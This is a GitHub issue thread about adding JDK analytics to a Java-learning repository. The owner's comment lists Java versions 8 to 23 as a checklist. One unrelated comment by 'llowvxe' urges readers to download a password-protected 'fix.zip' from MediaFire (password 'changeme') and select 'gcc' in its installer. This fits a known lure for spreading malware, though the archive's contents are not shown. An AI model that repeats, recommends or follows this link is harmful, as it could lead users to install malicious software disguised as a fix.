### ISSUE TITLE
Add JDK analytics to All-About-JDK

### ISSUE THREAD

**Issue by lcaohoanq** [lcaohoanq/javi#2]

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lcaohoanq** [comment]
Java versions, history: https://www.javatpoint.com/java-versions

- [x] java8
- [x] java9
- [x] java10
- [x] java11
- [x] java12
- [ ] java13
- [x] java14
- [x] java15
- [x] java16
- [ ] java17
- [ ] java18
- [ ] java19
- [ ] java20
- [ ] java21
- [ ] java22
- [ ] java23
